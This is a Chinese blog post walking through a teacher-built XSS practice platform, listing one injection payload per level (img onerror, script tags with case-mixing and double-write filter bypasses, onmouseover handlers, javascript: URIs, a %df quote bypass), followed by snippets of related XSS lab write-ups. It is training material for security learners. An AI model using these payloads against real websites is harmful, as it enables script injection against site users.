自用XSS闯关攻略

最新推荐文章于 2024-08-06 23:05:42 发布
最新推荐文章于 2024-08-06 23:05:42 发布
阅读量2.6k 收藏 3
点赞数
分类专栏: XSS闯关 文章标签: XSS闯关
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sdb5858874/article/details/80736839
版权

老师搭建了一个让我们练手的XSS闯关平台,在这里跟大家分享一下,希望在学XSS的同学看过之后能有收获链接如下:

http://114.115.183.86/zk/xsstest/xss_platform/code/xss01/index.php?name=chao

只要我们能使用JavaScript语言让页面出现一个弹框就算闯关成功,如果页面没能正常跳转,在URL中将xss01改成对应关卡就行
例如第8关: xss08


1.随便在name=后面加入一句XSS测试就可以

2."> <img src=1 οnerrοr=alert`1`>
3.'> <img src=1 οnerrοr=alert`1`>
4."> <img src=1 οnerrοr=alert`1`>
5."> <img src=1 οnerrοr=alert`1`>
6."> <img src=1 οnerrοr=alert`1`>
7."> <SCRIPT>alert`1`</SCRIPT>
8."> <SSCRIPTCRIPT>alert`1`</SSCRIPTCRIPT>
9."> <SCRIPT>alert`1`</SCRIPT>  或  "> <img src=1 ONError=alert`1`>
10." οnmοuseοver=alert(1)  //
11."> <a href=javascript:alert(1)>chao</a>      点击超链接chao




12."  οnmοuseοver=alert(1)//
13. " οnmοuseοver=alert`1`//
14. " οnmοuseοver=alert`1`//
15. " οnmοuseοver=alert`1`//
16.javaScript:alert(1)
17. javascript:alert(1)//http://
18.serach=123&&type=2"> <script>alert(1)</script>//
19.?name=xiaoming";  alert(1)//
20.在留言者这里直接写下  chao<script>alert(1)</script>


还有一个闯关题,复制下面的链接就可以
http://114.115.183.86/zk/xss_test.php?t3="
老师搭建的一个只有三个题
yi.      ' οnmοuseοver=alert(1) > //
er.     %df'> <script>alert(1)</script> //
san.    " οnmοuseοver=alert(1) //



白帽梦想家
关注
专栏目录
XSS闯关非完全攻略 1-10
Dreeee的博客
04-07 834
XSS靶场1-10关
xss闯关记录 1-10超详细
weixin_44717303的博客
03-31 738
xss挑战过关教程 挑战关卡准备环境第一关第二关第三关第四关第五关第六关第七关第八关第九关第十关 准备环境 首先需要一个 xss通关挑战源码 需要准备一个PHPstuday 最后需要一台可以正常联网的电脑 第一关 没有任何保护随便一条脚本语句均可 <a href=javascript:/00/,alert(%22M%22)>M</a> 第二关 "> <a href=javascript:/00/,alert(%22M%22)>M</a>// 对比
xss漏洞(五,xss-labs靶场搭建及简单讲解)
最新发布
2302_80280669的博客
08-06 638
本文基于github上的xss-labs靶场以及PHP study进行操作。
XSS靶场过关
m0_51581045的博客
03-27 5302
忘记把以前XSS靶场的笔记贴上来了,今天补一下
XSSlab闯关记录(1~10关)
m0_56375711的博客
12-07 446
xsslab1~10关闯关记录
XSS闯关6~10
qq_53142368的博客
04-02 238
学习内容: XSS闯关6~10关训练 学习时间: 2021.4.1 学习产出: 第六关: 咱们先输入 然后 发现r与i之间出现了一个下划线,所以咱们就试试大写绕过呗 就是 也可以使用url编码绕过,让iurl编码变成%69进行绕过,换一种函数也可以 用javascript函数,然后后面的内容就以网站的形式访问 第七关: 当输入 发现没有回应,查看源代码 发现script被过滤掉了,所以就是双写呗,咱们看看后台的源代码 发现这些全被替换为了空,并且大小写不能用,所以咱们就是双写绕过 第八关: 咱们输
做了一个XSS闯关游戏,攻略贴上来
yd0str
12-13 8816
游戏地址: http://xss-quiz.int21h.jp 第一关:比较简单,直接输入 http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9 第二关:也相对简单,闭合标签 http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb20
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如...
BUUCTF[第二章Web进阶]XSS闯关教程
DMXA的博客
11-01 680
攻击方式:这种攻击多见于论坛、博客和留言板,攻击者在发帖的过程中,将恶意代码连同正常信息一起注入帖子的内容中。当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞。存储型XSS又称为持久型XSS,攻击脚本将被永久的放在目标服务器的数据库或文件中,具有很高的隐蔽性。DOM型XSS其实是一种特殊的反射型XSS,它基于DOM文档对象模型的一种漏洞。(3)DOM型XSS
XSS闯关之第一关
weixin_33958366的博客
05-15 240
开启第一关 这是一个get传值的界面,没有任何文本框之类的东西,所以可以直接在url地址栏中来进行***。在地址栏中输入<script>alert(1)</script>,得到弹框查看一下php的源码文件可以看到,变量str接受到传来的参数没有进行过滤,直接echo出来,所以我们可以构造简单的payload。总结:没有添加任何函数进行过滤,典型的漏洞。可以直接构造任意可弹框...
XSS-9注入靶场闯关(小游戏)——第九关
qq_39330735的博客
02-04 620
XSS-9注入靶场闯关(小游戏)——第九关,绕过后台字符串过滤,找出过滤条件,夹带过滤条件进行Payload
Debian 6 vweb for pentester XSS第一关
学习
09-26 151
首先连接上靶机
XSS闯关——第一关:level1
老夏家的云
11-09 2178
第一关:level1   这里的payload为4,查看地址栏与之对应的传参为test   页面没有输入的地方,所以可以直接在地址框注入JavaScript脚本   回车过关:        ...
Xss-labs(1)第一关到第十一关
m0_46412408的博客
09-25 743
Xss-labs靶场训练第一关:查看页面源代码回显playload长度:插入一段js代码,get传参,一个简单的插入顺利来到第二关,二话不说先直接尝试插入,并没有成功:查看页面源代码:特殊字符被实体转义了我们需要闭合掉双引号即可,构造payload,这一关是闭合绕过来到第三关,随便输入一个闭合弹窗试试,符号也被实体化了:查看php源码。
pikachu XSS 通关手册
tj2718647721的博客
07-23 187
alert(document.cookie)
Xss小游戏通关攻略带解释
sirius的博客
08-28 5507
Xss小游戏通关攻略 实验环境:xss小游戏源码+phpstudy 源码地址:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 实验步骤:启动phpstudy,浏览器访问127.0.0.1/xss/后提示点击图片进入第一关。 第一关:输入的变量直接被输出,直接构造payload即可。 http://127.0.0.1/xss/level1.php?.
XSS-labs靶场过关秘籍(level 9-12)
qq_45741871的博客
09-21 1393
xss-labs靶场过关秘籍
XSS闯关攻略:从基础到进阶
"XSS闯关练习的详细笔记,包含了不同级别的XSS攻击payload实例和解决策略。" 在Web安全领域,XSS(Cross-Site Scripting)是一种常见且危险的攻击方式,允许攻击者在受害者的浏览器上执行恶意脚本。这个记录详细...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值